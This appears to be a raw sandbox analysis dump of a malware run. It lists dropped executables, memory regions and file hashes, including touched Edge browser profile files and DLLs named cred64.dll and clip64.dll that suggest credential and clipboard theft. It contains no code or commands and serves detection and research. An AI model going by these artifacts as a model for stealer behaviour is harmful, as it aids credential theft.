C:\Users\Admin\AppData\Local\Temp\76C8.exe

MD5 21b738f4b6e53e6d210996fa6ba6cc69
SHA1 3421aceeaa8f9f53169ae8af4f50f0d9d2c03f41
SHA256 3b1af64f9747985b3b79a7ce39c6625b43e562227dc2f96758118b2acb3e5e58
SHA512 f766a972fde598399091a82fc8db8d9edd25a9a5f9e5a0568769632091605eeb47bf3b44b69d37d51c1c7ab8be89cd4fb4846a5f06d719db885a35e049f1eb81

memory/2756-265-0x0000000007B10000-0x0000000007B20000-memory.dmp

memory/1452-266-0x0000000007A10000-0x0000000007A20000-memory.dmp

memory/6072-267-0x0000000005550000-0x0000000005551000-memory.dmp

memory/6072-269-0x0000000005830000-0x00000000058CC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\76C8.exe

MD5 21b738f4b6e53e6d210996fa6ba6cc69
SHA1 3421aceeaa8f9f53169ae8af4f50f0d9d2c03f41
SHA256 3b1af64f9747985b3b79a7ce39c6625b43e562227dc2f96758118b2acb3e5e58
SHA512 f766a972fde598399091a82fc8db8d9edd25a9a5f9e5a0568769632091605eeb47bf3b44b69d37d51c1c7ab8be89cd4fb4846a5f06d719db885a35e049f1eb81

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c2c7f621427f370018fd6efd17784177
SHA1 7c62c4ad479fe97d1512898e64d2110049f961a5
SHA256 62120ece71e41152eab2c78e1c21fe163772f0875aada3115d1385ed566f2a6e
SHA512 18a21b75178e4f8470f58f950a324ab65fedecba6b2aa09e5066af03cfb04f6d985be7c96946ef5e8ed659cf86c4cc1d048fd27bcd8707bae94b37882640d4ed

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 2c4e64d73abbd8118cc77bdb4002177a
SHA1 3aa2727eafd13aa692b0e3273f2b40b6d03a88e8
SHA256 f7dbfe46935441be274b5a50bd1cfdf959910a596c7aa7592ba5aac3eea5294a
SHA512 29b4c8dd346b40c8f51f7445ab418d9f9787bae1a2206a1d584f09750c1aa02e101114a53c2348a8b0e71877c692d0e5dbd74dfab3a4d5670005d32e259825dc

memory/5788-280-0x00000000023F0000-0x00000000024F0000-memory.dmp

memory/5788-281-0x00000000022D0000-0x00000000022D9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7C09.exe

MD5 109da216e61cf349221bd2455d2170d4
SHA1 ea6983b8581b8bb57e47c8492783256313c19480
SHA256 a94bec1ee46f4a7e50fbccb77c8604c8c32b78a4879d18f923b5fa5e8e80d400
SHA512 460d710c0ffbe612ce5b07ae74abf360ebcf9e88993f2fc4448f31b96005f76f6902453c023477438b676f62de93e1c3e9ba980836c12dc5fc617728a9346e26

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

memory/3880-285-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3880-282-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7C09.exe

MD5 109da216e61cf349221bd2455d2170d4
SHA1 ea6983b8581b8bb57e47c8492783256313c19480
SHA256 a94bec1ee46f4a7e50fbccb77c8604c8c32b78a4879d18f923b5fa5e8e80d400
SHA512 460d710c0ffbe612ce5b07ae74abf360ebcf9e88993f2fc4448f31b96005f76f6902453c023477438b676f62de93e1c3e9ba980836c12dc5fc617728a9346e26

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b981e8b300140ed1b3b4840c4924bdb4
SHA1 c55d4617e42a1a612668756f78da321d9e33d8c8
SHA256 41fe31b3db62ebb7ba1fb5849eca58d038c5b333c517617564511a10c62cd452
SHA512 bc3b6b7698b05c2cec6b035d3b8f22031430cdeaeea834dd764cd79b250b1ebafc9ea23803e876a4b40d6baa12fce9a0af263bdf4cb1d0f173d5f6cb5427568f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 25ac77f8c7c7b76b93c8346e41b89a95
SHA1 5a8f769162bab0a75b1014fb8b94f9bb1fb7970a
SHA256 8ad26364375358eac8238a730ef826749677c62d709003d84e758f0e7478cc4b
SHA512 df64a3593882972f3b10c997b118087c97a7fa684cd722624d7f5fb41d645c605d59a89eccf7518570ff9e73b4310432c4bb5864ee58e78c0743c0c1606853a7

memory/5144-283-0x0000000000400000-0x000000000046F000-memory.dmp

memory/5144-302-0x0000000002070000-0x00000000020CA000-memory.dmp

memory/5852-306-0x0000000004330000-0x000000000472D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8263.exe

MD5 1199c88022b133b321ed8e9c5f4e6739
SHA1 8e5668edc9b4e1f15c936e68b59c84e165c9cb07
SHA256 e6bd7a442e04eba451aa1f63819533b086c5a60fd9fa7506fa838515184e1836
SHA512 7aa8c3ed3a2985bb8a62557fd347d1c90790cd3f5e3b0b70c221b28cb17a0c163b8b1bac45bc014148e08105232e9abef33408a4d648ddc5362795e5669e3697

memory/5852-312-0x0000000004730000-0x000000000501B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\76C8.exe

MD5 21b738f4b6e53e6d210996fa6ba6cc69
SHA1 3421aceeaa8f9f53169ae8af4f50f0d9d2c03f41
SHA256 3b1af64f9747985b3b79a7ce39c6625b43e562227dc2f96758118b2acb3e5e58
SHA512 f766a972fde598399091a82fc8db8d9edd25a9a5f9e5a0568769632091605eeb47bf3b44b69d37d51c1c7ab8be89cd4fb4846a5f06d719db885a35e049f1eb81

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

memory/5184-320-0x00000000001C0000-0x00000000001DE000-memory.dmp

memory/5144-314-0x0000000072A80000-0x0000000073230000-memory.dmp

memory/3000-323-0x0000000000810000-0x000000000082E000-memory.dmp

memory/5852-325-0x0000000000400000-0x000000000266D000-memory.dmp

memory/3000-326-0x0000000072A80000-0x0000000073230000-memory.dmp

memory/5184-327-0x0000000072A80000-0x0000000073230000-memory.dmp

memory/3000-328-0x0000000005060000-0x0000000005070000-memory.dmp

memory/5184-329-0x0000000004AD0000-0x0000000004AE0000-memory.dmp

memory/6072-330-0x0000000072A80000-0x0000000073230000-memory.dmp

memory/5184-331-0x0000000000400000-0x0000000000431000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

memory/5184-340-0x0000000005E70000-0x0000000006032000-memory.dmp

memory/5184-341-0x0000000006060000-0x000000000658C000-memory.dmp

memory/3880-343-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2608-342-0x0000000003620000-0x0000000003636000-memory.dmp

memory/5184-347-0x0000000006640000-0x00000000066A6000-memory.dmp

memory/5184-348-0x0000000007070000-0x00000000070C0000-memory.dmp

memory/5184-349-0x00000000070F0000-0x0000000007166000-memory.dmp

memory/5932-353-0x00000000032A0000-0x00000000032D6000-memory.dmp

memory/5852-352-0x0000000000400000-0x000000000266D000-memory.dmp

memory/5932-354-0x0000000072A80000-0x0000000073230000-memory.dmp

memory/5932-355-0x0000000005A10000-0x0000000006038000-memory.dmp

memory/6132-356-0x00007FF63DEF0000-0x00007FF63E491000-memory.dmp

memory/5932-357-0x0000000003250000-0x0000000003260000-memory.dmp

memory/5144-358-0x0000000000400000-0x000000000046F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cw3rihwj.cxk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5932-361-0x00000000061B0000-0x0000000006216000-memory.dmp

memory/5932-360-0x00000000059D0000-0x00000000059F2000-memory.dmp

memory/5932-359-0x0000000003250000-0x0000000003260000-memory.dmp

memory/5144-374-0x0000000072A80000-0x0000000073230000-memory.dmp

memory/5932-378-0x0000000006390000-0x00000000066E4000-memory.dmp

memory/5184-384-0x0000000007220000-0x000000000723E000-memory.dmp

memory/5932-385-0x0000000006880000-0x000000000689E000-memory.dmp

memory/6072-387-0x00000000057F0000-0x0000000005805000-memory.dmp

memory/6072-388-0x00000000057F0000-0x0000000005805000-memory.dmp

memory/6072-391-0x00000000057F0000-0x0000000005805000-memory.dmp

memory/6072-393-0x00000000057F0000-0x0000000005805000-memory.dmp

memory/6072-395-0x00000000057F0000-0x0000000005805000-memory.dmp

memory/6072-397-0x00000000057F0000-0x0000000005805000-memory.dmp

memory/6072-399-0x00000000057F0000-0x0000000005805000-memory.dmp

memory/6072-401-0x00000000057F0000-0x0000000005805000-memory.dmp

memory/6072-404-0x00000000057F0000-0x0000000005805000-memory.dmp

memory/6072-407-0x00000000057F0000-0x0000000005805000-memory.dmp

memory/6072-409-0x00000000057F0000-0x0000000005805000-memory.dmp

memory/6072-411-0x00000000057F0000-0x0000000005805000-memory.dmp

memory/6072-414-0x00000000057F0000-0x0000000005805000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpAB40.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

memory/4164-437-0x0000000000400000-0x000000000047F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpAB84.tmp

MD5 9a24ca06da9fb8f5735570a0381ab5a2
SHA1 27bdb2f2456cefc0b3e19d9be0a0dd64cc13d5de
SHA256 9ef3c0aca07106effa1ad59c2c80e27225b2dd0808d588702dcf1a24d5f5fe00
SHA512 dd8ef799db6b1812c26ddc76b51e0ea3bbd5acde4e470a5e1152868e1aa55aa83b7370486f2d09158ffeda7dc8d95a2b071fe6bd086118efdb2b0d361cbf5183

memory/4164-487-0x0000000000400000-0x000000000047F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpAC35.tmp

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

memory/4164-587-0x0000000000400000-0x000000000047F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpABDE.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\tmpAC19.tmp

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Temp\tmpABE4.tmp

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 46299a80260944a1b01260e89945e7b8
SHA1 1bb6743dffa38952a392c491fd9126ce20b5fa65
SHA256 e6bb7fd759d599151dfc5f331008d8760b4f8d4882e7b781618ad0030954ba75
SHA512 96014334943e547f5063b8d370bbdb7da37c73cfb6624685fcf40ddb032c4191a98c52c571e08d166376395ccf32735d79fb4d0981d655558648281d7f773c60

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 57fbfab02f5b3bcb9d77c5405e18e125
SHA1 92334c614e9ab82c7ce3aa8efb95b3a949301bc0
SHA256 d95693cbc02c2e8d5d75bea40470e501eee3df8cc7e3a5da30c46a7518be01a0
SHA512 23d26838419d8735238c726a32a559d9778f5887ae185f2942752ec6eed4089c85430aa8de172a290cb009c6d5103548a0991ab8690bb3159e41be36b7769c7f

memory/5852-653-0x0000000000400000-0x000000000266D000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4